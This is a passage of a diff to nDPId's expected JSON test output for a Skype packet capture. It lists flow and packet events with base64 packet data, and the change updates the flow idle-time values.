Q3MjY1OCwgNTExNzA2NjQyLCA1NjgzOTU4MzMsIDU5NDI0Njk1NCwgNTk4MDYxMDY2LCA2MTU5ODMzNzksIDcyMDA1ODM2MSwgNzM1MDUxODMwLCA3MzYzNDE1MjgsIDc0MTI1NTYxMywgNzc2MDg3MjQ3LCA3ODA4NzA1ODEsIDc4Mjk4MTk0OSwgNzg1MjY2MTc3LCA4MTg3NTI3MTAsIDg1NTY4MjM5MCwgODg0MTIwMTMyLCA5MDg5MTQ4NjhdfQ=="} 01122{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1973,"source":"skype.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":3,"flow_last_seen":1431969717061,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":544,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":544,"pkt_l4_len":510,"thread_ts_msec":1431969717061,"pkt":"\/\/\/\/\/\/\/\/xCwDBkn+CABFAAISs5YAAEARA0HAqAFc\/\/\/\/\/0RcRFwB\/v9VeyJob3N0X2ludCI6IDMzNzUzNTk1OTMsICJ2ZXJzaW9uIjogWzEsIDhdLCAiZGlzcGxheW5hbWUiOiAiIiwgInBvcnQiOiAxNzUwMCwgIm5hbWVzcGFjZXMiOiBbMTQ4MTkzMzcsIDE3NjA5OTYzLCAyMDY0OTM0OSwgMjg1MjE2MDcsIDU4MzQ0OTk2LCA2MDU5NDk4MywgNjQ0MzYwOTksIDk2ODUzMjI0LCA5OTQ2OTc3MywgMTAxMDQ3OTk2LCAxMDgxNTkxMDIsIDEyNTU0MDU2NiwgMTc2OTY0MzA3LCAyNDM2ODI5ODYsIDI0NzkyNTA4NSwgMjYwNDY1MjYxLCAyNzA0MDQ3NDIsIDI4Mzg2MTQ1NywgNDI0NTQwMTk3LCA0NDgzOTczOTMsIDQ1MTQ3MjY1OCwgNTExNzA2NjQyLCA1NjgzOTU4MzMsIDU5NDI0Njk1NCwgNTk4MDYxMDY2LCA2MTU5ODMzNzksIDcyMDA1ODM2MSwgNzM1MDUxODMwLCA3MzYzNDE1MjgsIDc0MTI1NTYxMywgNzc2MDg3MjQ3LCA3ODA4NzA1ODEsIDc4Mjk4MTk0OSwgNzg1MjY2MTc3LCA4MTg3NTI3MTAsIDg1NTY4MjM5MCwgODg0MTIwMTMyLCA5MDg5MTQ4NjhdfQ=="} 01118{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1974,"source":"skype.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":3,"flow_last_seen":1431969717062,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":544,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":544,"pkt_l4_len":510,"thread_ts_msec":1431969717062,"pkt":"\/\/\/\/\/\/\/\/xCwDBkn+CABFAAISf4EAAEARdK7AqAFcwKgB\/0RcRFwB\/jyueyJob3N0X2ludCI6IDMzNzUzNTk1OTMsICJ2ZXJzaW9uIjogWzEsIDhdLCAiZGlzcGxheW5hbWUiOiAiIiwgInBvcnQiOiAxNzUwMCwgIm5hbWVzcGFjZXMiOiBbMTQ4MTkzMzcsIDE3NjA5OTYzLCAyMDY0OTM0OSwgMjg1MjE2MDcsIDU4MzQ0OTk2LCA2MDU5NDk4MywgNjQ0MzYwOTksIDk2ODUzMjI0LCA5OTQ2OTc3MywgMTAxMDQ3OTk2LCAxMDgxNTkxMDIsIDEyNTU0MDU2NiwgMTc2OTY0MzA3LCAyNDM2ODI5ODYsIDI0NzkyNTA4NSwgMjYwNDY1MjYxLCAyNzA0MDQ3NDIsIDI4Mzg2MTQ1NywgNDI0NTQwMTk3LCA0NDgzOTczOTMsIDQ1MTQ3MjY1OCwgNTExNzA2NjQyLCA1NjgzOTU4MzMsIDU5NDI0Njk1NCwgNTk4MDYxMDY2LCA2MTU5ODMzNzksIDcyMDA1ODM2MSwgNzM1MDUxODMwLCA3MzYzNDE1MjgsIDc0MTI1NTYxMywgNzc2MDg3MjQ3LCA3ODA4NzA1ODEsIDc4Mjk4MTk0OSwgNzg1MjY2MTc3LCA4MTg3NTI3MTAsIDg1NTY4MjM5MCwgODg0MTIwMTMyLCA5MDg5MTQ4NjhdfQ=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1984,"source":"skype.pcap","alias":"nDPId-test","flow_id":253,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969717177,"flow_last_seen":1431969717177,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969717177,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.14.46.121","src_port":50123,"dst_port":4415,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1984,"source":"skype.pcap","alias":"nDPId-test","flow_id":253,"flow_packet_id":1,"flow_last_seen":1431969717177,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969717177,"pkt":"0NQSxnP1PBXCt3IOCABFAABA+WNAAEAGAQPAqAEiUA4uecPLET9q+lcrAAAAALAC\/\/9zkwAAAgQFtAEDAwUBAQgKPiOtxAAAAAAEAgAA"} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1987,"source":"skype.pcap","alias":"nDPId-test","flow_id":253,"flow_packet_id":2,"flow_last_seen":1431969717265,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969717265,"pkt":"PBXCt3IO0NQSxnP1CABFAABAoQ1AAHQGJVlQDi55wKgBIhE\/w8sUK4TLavpXLLAS\/\/\/FfwAAAgQFrAEDAwABAQgKAAAAAAAAAAABAQQC"} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1988,"source":"skype.pcap","alias":"nDPId-test","flow_id":253,"flow_packet_id":3,"flow_last_seen":1431969717265,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969717265,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0NNxAAEAGxZbAqAEiUA4uecPLET9q+lcsFCuEzIAQECwJ2AAAAQEICj4jrhsAAAAA"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1992,"source":"skype.pcap","alias":"nDPId-test","flow_id":254,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969717295,"flow_last_seen":1431969717295,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969717295,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"81.133.19.185","src_port":50124,"dst_port":44431,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1992,"source":"skype.pcap","alias":"nDPId-test","flow_id":254,"flow_packet_id":1,"flow_last_seen":1431969717295,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969717295,"pkt":"0NQSxnP1PBXCt3IOCABFAABAu4NAAEAGWCzAqAEiUYUTucPMrY9zRWLSAAAAALAC\/\/\/cJAAAAgQFtAEDAwUBAQgKPiOuOAAAAAAEAgAA"} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2002,"source":"skype.pcap","alias":"nDPId-test","flow_id":254,"flow_packet_id":2,"flow_last_seen":1431969717374,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969717374,"pkt":"PBXCt3IO0NQSxnP1CABFAABAwAFAADAGY65RhRO5wKgBIq2Pw8wuoXfGc0Vi07AS\/\/\/8vwAAAgQFrAEDAwUBAQgKArA2RD4jrjgEAgAA"} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2003,"source":"skype.pcap","alias":"nDPId-test","flow_id":254,"flow_packet_id":3,"flow_last_seen":1431969717375,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969717375,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0inxAAEAGiT\/AqAEiUYUTucPMrY9zRWLTLqF3x4AQECwsDQAAAQEICj4jroYCsDZE"} -00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2044,"source":"skype.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969717899,"flow_last_seen":1431969717899,"flow_idle_time":7440000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1431969717899,"l3_proto":"ip4","src_ip":"17.143.160.22","dst_ip":"192.168.1.34","src_port":5223,"dst_port":49447,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00756{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2044,"source":"skype.pcap","alias":"nDPId-test","flow_id":255,"flow_packet_id":1,"flow_last_seen":1431969717899,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":279,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":279,"pkt_l4_len":245,"thread_ts_msec":1431969717899,"pkt":"PBXCt3IO0NQSxnP1CABFAAEJlCBAADAGQl8Rj6AWwKgBIhRnwSeBM8VdlvCqUoAYASHIigAAAQEIClVKAjo+IiGKFwMBANBGiA2FCgkg8zogS8Wv8uA0hKKXZpqXahZerQ98bBCn7C+LnTtdb1gFMe8akVD0ZXaKV2LbbgrevU7SQvBoNrIKmLDngOd7HnJnwMZSKAgZhBWjSGnNxPPChGecLDOMDXdtNcHO5aH0kerDi4eahd\/xxcweKHEqdaSg9EF7AN1znxgL9Vtu5lzdAyFIAlRZuEfAfgPOG5VblTu4iCKf5kwtqrTH0XrU9yr9hT+57cz\/TU37sy04NvAQJNXRsNfuIJU+SbJ1mgQuWHV+U5AtBgSt"} -00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2044,"source":"skype.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969717899,"flow_last_seen":1431969717899,"flow_idle_time":7440000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1431969717899,"l3_proto":"ip4","src_ip":"17.143.160.22","dst_ip":"192.168.1.34","src_port":5223,"dst_port":49447,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"ApplePush","breed":"Acceptable","category":"Cloud"}} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2045,"source":"skype.pcap","alias":"nDPId-test","flow_id":255,"flow_packet_id":2,"flow_last_seen":1431969717900,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969717900,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0ie5AAEAGPWbAqAEiEY+gFsEnFGeW8KpSgTPGMoAQD\/lO7gAAAQEICj4jsIZVSgI6"} -00593{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2046,"source":"skype.pcap","alias":"nDPId-test","flow_id":255,"flow_packet_id":3,"flow_last_seen":1431969717901,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":156,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":156,"pkt_l4_len":122,"thread_ts_msec":1431969717901,"pkt":"0NQSxnP1PBXCt3IOCABFAACOywdAAEAG+\/LAqAEiEY+gFsEnFGeW8KpSgTPGMoAYEAClWwAAAQEICj4jsIdVSgI6FwMBACBFSXcAQNGwOhcu0QVlHuKzyvFkGgpCme0Kai94jEbJ0RcDAQAwQN+VK2ikiOW7uk5UyLlTNolrUZSBmQX1wD8NXzXPIFfAPuABh4UNMZuiOLR\/\/d5p"} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1984,"source":"skype.pcap","alias":"nDPId-test","flow_id":253,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969717177,"flow_last_seen":1431969717177,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969717177,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.14.46.121","src_port":50123,"dst_port":4415,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1984,"source":"skype.pcap","alias":"nDPId-test","flow_id":253,"flow_packet_id":1,"flow_last_seen":1431969717177,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969717177,"pkt":"0NQSxnP1PBXCt3IOCABFAABA+WNAAEAGAQPAqAEiUA4uecPLET9q+lcrAAAAALAC\/\/9zkwAAAgQFtAEDAwUBAQgKPiOtxAAAAAAEAgAA"} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1987,"source":"skype.pcap","alias":"nDPId-test","flow_id":253,"flow_packet_id":2,"flow_last_seen":1431969717265,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969717265,"pkt":"PBXCt3IO0NQSxnP1CABFAABAoQ1AAHQGJVlQDi55wKgBIhE\/w8sUK4TLavpXLLAS\/\/\/FfwAAAgQFrAEDAwABAQgKAAAAAAAAAAABAQQC"} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1988,"source":"skype.pcap","alias":"nDPId-test","flow_id":253,"flow_packet_id":3,"flow_last_seen":1431969717265,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969717265,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0NNxAAEAGxZbAqAEiUA4uecPLET9q+lcsFCuEzIAQECwJ2AAAAQEICj4jrhsAAAAA"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1992,"source":"skype.pcap","alias":"nDPId-test","flow_id":254,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969717295,"flow_last_seen":1431969717295,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969717295,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"81.133.19.185","src_port":50124,"dst_port":44431,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1992,"source":"skype.pcap","alias":"nDPId-test","flow_id":254,"flow_packet_id":1,"flow_last_seen":1431969717295,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969717295,"pkt":"0NQSxnP1PBXCt3IOCABFAABAu4NAAEAGWCzAqAEiUYUTucPMrY9zRWLSAAAAALAC\/\/\/cJAAAAgQFtAEDAwUBAQgKPiOuOAAAAAAEAgAA"} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2002,"source":"skype.pcap","alias":"nDPId-test","flow_id":254,"flow_packet_id":2,"flow_last_seen":1431969717374,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969717374,"pkt":"PBXCt3IO0NQSxnP1CABFAABAwAFAADAGY65RhRO5wKgBIq2Pw8wuoXfGc0Vi07AS\/\/\/8vwAAAgQFrAEDAwUBAQgKArA2RD4jrjgEAgAA"} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2003,"source":"skype.pcap","alias":"nDPId-test","flow_id":254,"flow_packet_id":3,"flow_last_seen":1431969717375,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969717375,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0inxAAEAGiT\/AqAEiUYUTucPMrY9zRWLTLqF3x4AQECwsDQAAAQEICj4jroYCsDZE"} +00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2044,"source":"skype.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969717899,"flow_last_seen":1431969717899,"flow_idle_time":7560000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1431969717899,"l3_proto":"ip4","src_ip":"17.143.160.22","dst_ip":"192.168.1.34","src_port":5223,"dst_port":49447,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00756{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2044,"source":"skype.pcap","alias":"nDPId-test","flow_id":255,"flow_packet_id":1,"flow_last_seen":1431969717899,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":279,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":279,"pkt_l4_len":245,"thread_ts_msec":1431969717899,"pkt":"PBXCt3IO0NQSxnP1CABFAAEJlCBAADAGQl8Rj6AWwKgBIhRnwSeBM8VdlvCqUoAYASHIigAAAQEIClVKAjo+IiGKFwMBANBGiA2FCgkg8zogS8Wv8uA0hKKXZpqXahZerQ98bBCn7C+LnTtdb1gFMe8akVD0ZXaKV2LbbgrevU7SQvBoNrIKmLDngOd7HnJnwMZSKAgZhBWjSGnNxPPChGecLDOMDXdtNcHO5aH0kerDi4eahd\/xxcweKHEqdaSg9EF7AN1znxgL9Vtu5lzdAyFIAlRZuEfAfgPOG5VblTu4iCKf5kwtqrTH0XrU9yr9hT+57cz\/TU37sy04NvAQJNXRsNfuIJU+SbJ1mgQuWHV+U5AtBgSt"} +00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2044,"source":"skype.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969717899,"flow_last_seen":1431969717899,"flow_idle_time":7560000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1431969717899,"l3_proto":"ip4","src_ip":"17.143.160.22","dst_ip":"192.168.1.34","src_port":5223,"dst_port":49447,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"ApplePush","breed":"Acceptable","category":"Cloud"}} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2045,"source":"skype.pcap","alias":"nDPId-test","flow_id":255,"flow_packet_id":2,"flow_last_seen":1431969717900,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969717900,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0ie5AAEAGPWbAqAEiEY+gFsEnFGeW8KpSgTPGMoAQD\/lO7gAAAQEICj4jsIZVSgI6"} +00593{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2046,"source":"skype.pcap","alias":"nDPId-test","flow_id":255,"flow_packet_id":3,"flow_last_seen":1431969717901,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":156,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":156,"pkt_l4_len":122,"thread_ts_msec":1431969717901,"pkt":"0NQSxnP1PBXCt3IOCABFAACOywdAAEAG+\/LAqAEiEY+gFsEnFGeW8KpSgTPGMoAYEAClWwAAAQEICj4jsIdVSgI6FwMBACBFSXcAQNGwOhcu0QVlHuKzyvFkGgpCme0Kai94jEbJ0RcDAQAwQN+VK2ikiOW7uk5UyLlTNolrUZSBmQX1wD8NXzXPIFfAPuABh4UNMZuiOLR\/\/d5p"} 00658{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2047,"source":"skype.pcap","alias":"nDPId-test","flow_id":238,"flow_packet_id":3,"flow_last_seen":1431969717905,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1431969717905,"pkt":"PBXCt3IOxCwDBkn+CABFAADBmPEAAP8RfzrAqAFc4AAA+xTpFOkArRpOAAAAAAAEAAMAAAAAC19hZnBvdmVydGNwBF90Y3AFbG9jYWwAAAwAAQRfcmZiwBgADAABBF9zbWLAGAAMAAEGX2FkaXNrwBgADAABwAwADAABAAAPuAAWE0x1Y2HigJlzIE1hY0Jvb2tQcm\/ADMAMAAwAAQAADAoAEA1MdWNh4oCZcyBpTWFjwAzAMwAMAAEAAAwKABANTHVjYeKAmXMgaU1hY8Az"} 00691{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2048,"source":"skype.pcap","alias":"nDPId-test","flow_id":239,"flow_packet_id":3,"flow_last_seen":1431969717906,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":227,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":227,"pkt_l4_len":173,"thread_ts_msec":1431969717906,"pkt":"MzMAAAD7xCwDBkn+ht1gAU9NAK0R\/\/6AAAAAAAAAxiwD\/\/4GSf7\/AgAAAAAAAAAAAAAAAAD7FOkU6QCtrJ4AAAAAAAQAAwAAAAALX2FmcG92ZXJ0Y3AEX3RjcAVsb2NhbAAADAABBF9yZmLAGAAMAAEEX3NtYsAYAAwAAQZfYWRpc2vAGAAMAAHADAAMAAEAAA+4ABYTTHVjYeKAmXMgTWFjQm9va1Byb8AMwAwADAABAAAMCgAQDUx1Y2HigJlzIGlNYWPADMAzAAwAAQAADAoAEA1MdWNh4oCZcyBpTWFjwDM="} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2055,"source":"skype.pcap","alias":"nDPId-test","flow_id":256,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969717949,"flow_last_seen":1431969717949,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969717949,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.218.125","src_port":50125,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2055,"source":"skype.pcap","alias":"nDPId-test","flow_id":256,"flow_packet_id":1,"flow_last_seen":1431969717949,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969717949,"pkt":"0NQSxnP1PBXCt3IOCABFAABA1MFAAEAGbfDAqAEiW77afcPNMD7mkcxwAAAAALAC\/\/+pEQAAAgQFtAEDAwUBAQgKPiOwswAAAAAEAgAA"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2056,"source":"skype.pcap","alias":"nDPId-test","flow_id":257,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969717949,"flow_last_seen":1431969717949,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969717949,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.23","src_port":50126,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2056,"source":"skype.pcap","alias":"nDPId-test","flow_id":257,"flow_packet_id":1,"flow_last_seen":1431969717949,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969717949,"pkt":"0NQSxnP1PBXCt3IOCABFAABAjMJAAEAGuFXAqAEiW77YF8POMD6CImXAAAAAALAC\/\/92lQAAAgQFtAEDAwUBAQgKPiOwtAAAAAAEAgAA"} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2057,"source":"skype.pcap","alias":"nDPId-test","flow_id":257,"flow_packet_id":2,"flow_last_seen":1431969717992,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969717992,"pkt":"PBXCt3IO0NQSxnP1CABFCAA8AABAADUGUBRbvtgXwKgBIjA+w86t1YyggiJlwaASOJDgygAAAgQFrAQCCAoNJSaXPiOwtAEDAwk="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2058,"source":"skype.pcap","alias":"nDPId-test","flow_id":257,"flow_packet_id":3,"flow_last_seen":1431969717992,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969717992,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0ynpAAEAGeqnAqAEiW77YF8POMD6CImXBrdWMoYAQECw3ygAAAQEICj4jsN8NJSaX"} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2062,"source":"skype.pcap","alias":"nDPId-test","flow_id":256,"flow_packet_id":2,"flow_last_seen":1431969718010,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969718010,"pkt":"PBXCt3IO0NQSxnP1CABFAAA0kN5AAPQG\/d5bvtp9wKgBIjA+w83ZQ\/6U5pHMcYASH\/7YKwAAAgQFoAEDAwQBAQQC"} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2063,"source":"skype.pcap","alias":"nDPId-test","flow_id":256,"flow_packet_id":3,"flow_last_seen":1431969718010,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431969718010,"pkt":"0NQSxnP1PBXCt3IOCABFAAAonhdAAEAGpLLAqAEiW77afcPNMD7mkcxx2UP+lVAQIAAY5QAA"} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2078,"source":"skype.pcap","alias":"nDPId-test","flow_id":258,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969718289,"flow_last_seen":1431969718289,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969718289,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.14.46.121","src_port":50127,"dst_port":4415,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 